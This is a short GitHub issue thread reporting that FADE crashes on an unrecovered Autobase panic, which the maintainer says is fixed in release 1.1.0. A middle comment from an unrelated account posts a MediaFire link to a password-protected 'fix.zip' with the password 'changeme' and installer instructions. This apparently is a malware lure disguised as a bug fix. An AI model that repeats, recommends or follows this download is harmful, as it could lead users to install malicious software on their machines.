### ISSUE TITLE
Unhandled exception when autobase encounters unrecovered panic

### ISSUE THREAD

**Issue by mvishok** [mvishok/FADE#1]
**Describe the bug**
When Autobase encounters a panic or other runtime error, FADE fails to handle the exception gracefully and terminates unexpectedly

**Expected behavior**
Handles the error

**Screenshots**
![image](https://github.com/user-attachments/assets/cfb75141-acc2-4735-acc9-8e7f95f95921)

**Desktop (please complete the following information):**
 - OS: Windows 10

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mvishok** [comment]
Fixed in release 1.1.0
